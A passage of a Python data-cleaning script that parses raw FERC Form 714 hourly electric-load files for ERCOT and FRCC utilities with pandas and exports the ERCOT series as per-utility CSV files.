        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['AENX'].loc[2:].astype(float)/1000).values,
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['AENX'].astype(float)/1000).values,
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[3].str.replace(',', '').astype(float)/1000).values
    },
    3278 : {  # CPL
        1993 : pd.read_fwf('%s/ercot/1993/CPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/CPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/CPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/CPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['CPLC'].loc[2:].astype(int)/1000).values
    },
    8901 : {  # HLP
        1993 : pd.read_fwf('%s/ercot/1993/HLP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/HLP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/HLP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/HLP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/HLP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['HLPC'].loc[2:].astype(int)/1000).values
    },
    11269: {  # LCRA
        1993 : pd.read_fwf('%s/ercot/1993/LCRA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_csv('%s/ercot/1994/LCRA94' % (fulldir), skiprows=4).iloc[:, -1].values,
        1995 : pd.read_fwf('%s/ercot/1995/LCRA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/LCRA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/LCR97' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['LCRA'].loc[2:].astype(int)/1000).values,
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['LCRA'].astype(float)/1000).values,
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[6].str.replace(',', '').astype(float)/1000).values
    },
    13670 : {  # NTEC
        1993 : pd.read_csv('%s/ercot/1993/NTEC93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
        1994 : pd.read_fwf('%s/ercot/1994/NTEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/NTEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/NTEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/NTEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2001 : pd.read_fwf('%s/ercot/2001/NTEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
    },
    2409 : {  # PUB
        1993 : pd.read_fwf('%s/ercot/1993/PUB93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/PUB94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/PUB95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/PUB96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/PUB97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['PUBX'].loc[2:].astype(int)/1000).values,
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['PUBX'].astype(float)/1000).values,
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[7].str.replace(',', '').astype(float)/1000).values
    },
    40233 : {  # SRGT
        1993 : pd.read_csv('%s/ercot/1993/SRGT93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
        1994 : pd.read_fwf('%s/ercot/1994/SRGT94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/SRGT95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/SRGT96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/SRGT97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
    },
    17583 : {  # STEC
        1993 : pd.read_fwf('%s/ercot/1993/STEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['STEC'].loc[2:].astype(int)/1000).values,
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['STEC'].astype(float)/1000).values,
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[9].str.replace(',', '').astype(float)/1000).values
    },
    44372 : {  # TUEC
        1993 : pd.read_fwf('%s/ercot/1993/TUEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/TUEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/TUEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/TUE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/TUE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['TUEC'].loc[2:].astype(int)/1000).values
    },
    18715 : {  # TMPP
        1993 : pd.read_csv('%s/ercot/1993/TMPP93' % (fulldir), skiprows=7, header=None, sep=' ', skipinitialspace=True).iloc[:, 3:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/TMPP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/TMPP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['TMPP'].astype(float)/1000).values,
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[10].str.replace(',', '').astype(float)/1000).values
    },
    18679 : {  # TXLA
        1993 : pd.read_csv('%s/ercot/1993/TEXLA93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
        1995 : pd.read_fwf('%s/ercot/1995/TXLA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/TXLA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/TXLA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['TXLA'].loc[2:].astype(int)/1000).values
    },
    20404 : {  # WTU
        1993 : pd.read_fwf('%s/ercot/1993/WTU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(str).apply(lambda x: x.str.replace('\s', '0')).astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/WTU94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/WTU96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/WTU97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['WTUC'].loc[2:].astype(int)/1000).values
    }
}
# Post-process and export the ERCOT series.
# Manual outlier removal: the TUEC (respondent 2409) 1998/1999 files contain
# spurious readings far above any plausible load (> 300, units as parsed);
# zero them here so the zero->NaN conversion below marks them missing.
ercot[2409][1998][ercot[2409][1998] > 300] = 0
ercot[2409][1999][ercot[2409][1999] > 300] = 0
if not os.path.exists('./ercot'):
    os.mkdir('ercot')
# Sorted keys give a deterministic processing/file-write order (plain dict
# iteration order is arbitrary on the Python 2 interpreters this targets).
for k in sorted(ercot.keys()):
    print(k)  # parenthesized form is valid in both Python 2 and Python 3
    # Stitch each utility's per-year arrays into one hourly-stamped series:
    # every year's array is indexed from Jan 1 of that year for exactly as
    # many hours as the array holds, then all years are concatenated and
    # time-sorted into a single 'load' column.
    s = pd.DataFrame(pd.concat([pd.Series(ercot[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(ercot[k][i]))) for i in ercot[k].keys()]).sort_index(), columns=['load'])
    # Zeros in the raw files denote missing (or manually removed) hours;
    # convert them to NaN so downstream consumers treat them as gaps.
    s['load'] = s['load'].astype(float).replace(0, np.nan)
    s.to_csv('./ercot/%s.csv' % k)
###### FRCC
# GAIN: 6909
# LAKE: 10623
# FMPA: 6567
# FPC: 6455
# FPL: 6452
# JEA: 9617
# KUA: 10376
# OUC: 14610
# TECO: 18454
# SECI: 21554
# Hourly load data for FRCC (Florida Reliability Coordinating Council)
# utilities, keyed by FERC respondent ID, then by year.  Each value is a flat
# 1-D array of hourly loads for that utility-year, parsed from the raw FERC
# Form 714 submissions.  Parser arguments (fixed widths, skiprows, skipfooter,
# separators, column slices) are tuned per file because the raw submissions
# change layout from year to year.
# NOTE(review): `sheetname=` is the pre-0.21 pandas spelling of `sheet_name=`;
# this script appears to target that pandas era (it is Python 2 elsewhere) --
# confirm before upgrading the environment.
frcc = {
    # GAIN -- respondent 6909
    6909 : {
        1993 : pd.read_fwf('%s/frcc/1993/GAIN93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1994 : pd.read_csv('%s/frcc/1994/GAIN94' % (fulldir), header=None, sep=' ', skipinitialspace=True, skipfooter=2, skiprows=5).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/GAIN95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_csv('%s/frcc/1996/GAIN96' % (fulldir), sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/GAIN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : pd.read_csv('%s/frcc/1998/GAIN98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=3, header=None).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/GAIN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2000 : pd.read_fwf('%s/frcc/2000/GAIN00' % (fulldir), header=None).iloc[:, 4:].values.ravel(),
        # 2002/2003 workbooks hold two rows per day (12 hours each) in
        # columns 8:20 of the relevant sheet; 730 rows = 365 days.
        2002 : pd.read_excel('%s/frcc/2002/GAIN02' % (fulldir), sheetname=1, skiprows=3, header=None).iloc[:730, 8:20].values.ravel(),
        2003 : pd.read_excel('%s/frcc/2003/GAIN03' % (fulldir), sheetname=2, skiprows=3, header=None).iloc[:730, 8:20].values.ravel(),
        2004 : pd.read_excel('%s/frcc/2004/GAIN04' % (fulldir), sheetname=0, header=None).iloc[:, 8:].values.ravel()
    },
    # LAKE -- respondent 10623 (fixed-width, 12 values per row, every year)
    10623: {
        1993 : pd.read_fwf('%s/frcc/1993/LAKE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/LAKE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/LAKE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/frcc/1996/LAKE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/LAKE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1998 : pd.read_fwf('%s/frcc/1998/LAKE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/LAKE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        2000 : pd.read_fwf('%s/frcc/2000/LAKE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2001 : pd.read_fwf('%s/frcc/2001/LAKE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        2002 : pd.read_fwf('%s/frcc/2002/LAKE02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
    },
    # FMPA -- respondent 6567
    6567 : {
        1993 : pd.read_fwf('%s/frcc/1993/FMPA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/FMPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/FMPA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/frcc/1996/FMPA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/FMPA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1998 : pd.read_fwf('%s/frcc/1998/FMPA98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/FMPA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].values.ravel(),
        2001 : pd.read_csv('%s/frcc/2001/FMPA01' % (fulldir), header=None, sep=' ', skipinitialspace=True, skiprows=6).iloc[:, 2:-1].values.ravel(),
        2002 : pd.read_csv('%s/frcc/2002/FMPA02' % (fulldir), header=None, sep='\t', skipinitialspace=True, skiprows=7).iloc[:, 1:].values.ravel(),
        2003 : pd.read_csv('%s/frcc/2003/FMPA03' % (fulldir), header=None, sep='\t', skipinitialspace=True, skiprows=7).iloc[:, 1:].values.ravel(),
        2004 : pd.read_csv('%s/frcc/2004/FMPA04' % (fulldir), header=None, sep=' ', skipinitialspace=True, skiprows=6, skipfooter=1).iloc[:, 1:].values.ravel()
    },
    # FPC -- respondent 6455 (format shifts from text to Excel in 1996)
    6455 : {
        1993 : pd.read_csv('%s/frcc/1993/FPC93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
        1994 : pd.read_csv('%s/frcc/1994/FPC94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
        1995 : pd.read_csv('%s/frcc/1995/FPC95' % (fulldir), engine='python', header=None)[0].values,
        1996 : pd.read_excel('%s/frcc/1996/FPC96' % (fulldir), header=None, skiprows=2, skipfooter=1).iloc[:, 6:].values.ravel(),
        1998 : pd.read_excel('%s/frcc/1998/FPC98' % (fulldir), header=None, skiprows=5).iloc[:, 7:].values.ravel(),
        1999 : pd.read_excel('%s/frcc/1999/FPC99' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
        2000 : pd.read_excel('%s/frcc/2000/FPC00' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
        2001 : pd.read_excel('%s/frcc/2001/FPC01' % (fulldir), header=None, skiprows=5).iloc[:, 7:].values.ravel(),
        2002 : pd.read_excel('%s/frcc/2002/FPC02' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
        2004 : pd.read_excel('%s/frcc/2004/FPC04' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel()
    },
    # FPL -- respondent 6452.  Raw files are tab-delimited text with quoted,
    # comma-grouped numbers and literal '\r\n' line ends, so each year is
    # split/cleaned by hand: strip line endings, quotes and thousands commas,
    # turn empty cells into NaN, then flatten to one array.
    6452 : {
        1993 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1993/FPL93' % (fulldir), 'r').readlines()]).iloc[:365, :24].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1994 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1994/FPL94' % (fulldir), 'r').readlines()]).iloc[3:, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1995 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1995/FPL95' % (fulldir), 'r').readlines()[3:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1996 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1996/FPL96' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1997 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1997/FPL97' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1998 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1998/FPL98' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        1999 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1999/FPL99' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2000 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2000/FPL00' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2001 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2001/FPL01' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2002 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2002/FPL02' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2003 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2003/FPL03' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
        2004 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2004/FPL04' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel()
    },
    # JEA -- respondent 9617 (single load column, column index 2)
    9617 : {
        1993 : pd.read_csv('%s/frcc/1993/JEA93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
        1994 : pd.read_csv('%s/frcc/1994/JEA94' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
        1996 : pd.read_fwf('%s/frcc/1996/JEA96' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/JEA97' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
        1998 : pd.read_csv('%s/frcc/1998/JEA98' % (fulldir), sep='\t', header=None)[2].values,
        1999 : pd.read_csv('%s/frcc/1999/JEA99' % (fulldir), sep='\t', header=None)[2].values,
        2000 : pd.read_excel('%s/frcc/2000/JEA00' % (fulldir), header=None)[2].values,
        2001 : pd.read_excel('%s/frcc/2001/JEA01' % (fulldir), header=None, skiprows=2)[2].values,
        2002 : pd.read_excel('%s/frcc/2002/JEA02' % (fulldir), header=None, skiprows=1)[2].values,
        2003 : pd.read_excel('%s/frcc/2003/JEA03' % (fulldir), header=None, skiprows=1)[2].values,
        2004 : pd.read_excel('%s/frcc/2004/JEA04' % (fulldir), header=None, skiprows=1)[2].values
    },
    # KUA -- respondent 10376 (only a handful of years were filed/usable)
    10376 : {
        1994 : pd.read_csv('%s/frcc/1994/KUA94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_csv('%s/frcc/1995/KUA95' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_csv('%s/frcc/1997/KUA97' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
        2001 : pd.read_csv('%s/frcc/2001/KUA01' % (fulldir), skiprows=1, header=None, sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel(),
        2002 : pd.read_csv('%s/frcc/2002/KUA02' % (fulldir), skipfooter=1, header=None, sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel()
    },
    # OUC -- respondent 14610 (fixed-width, same 12-value layout every year)
    14610 : {
        1993 : pd.read_fwf('%s/frcc/1993/OUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/OUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/OUC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/frcc/1996/OUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/frcc/1997/OUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1998 : pd.read_fwf('%s/frcc/1998/OUC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/frcc/1999/OUC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2000 : pd.read_fwf('%s/frcc/2000/OUC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2001 : pd.read_fwf('%s/frcc/2001/OUC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].values.ravel(),
        2002 : pd.read_fwf('%s/frcc/2002/OUC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
    },
    # TECO -- respondent 18454
    18454 : {
        1993 : pd.read_fwf('%s/frcc/1993/TECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/TECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        1998 : pd.read_csv('%s/frcc/1998/TECO98' % (fulldir), engine='python', skiprows=3, header=None)[0].values,
        1999 : pd.read_csv('%s/frcc/1999/TECO99' % (fulldir), engine='python', skiprows=3, header=None)[0].values,
        # 2000 rows carry trailing junk after the load value; keep only the
        # first 4 characters before converting to int.
        2000 : pd.read_csv('%s/frcc/2000/TECO00' % (fulldir), engine='python', skiprows=3, header=None)[0].str[:4].astype(int).values,
        2001 : pd.read_csv('%s/frcc/2001/TECO01' % (fulldir), skiprows=3, header=None)[0].values,
        2002 : pd.read_csv('%s/frcc/2002/TECO02' % (fulldir), sep='\t').loc[:, 'HR1':].values.ravel(),
        2003 : pd.read_csv('%s/frcc/2003/TECO03' % (fulldir), skiprows=2, header=None, sep=' ', skipinitialspace=True).iloc[:, 2:].values.ravel()
    },
    # SECI -- respondent 21554 (hour columns start at index 3)
    21554 : {
        1993 : pd.read_fwf('%s/frcc/1993/SECI93' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1994 : pd.read_fwf('%s/frcc/1994/SECI94' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1995 : pd.read_fwf('%s/frcc/1995/SECI95' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
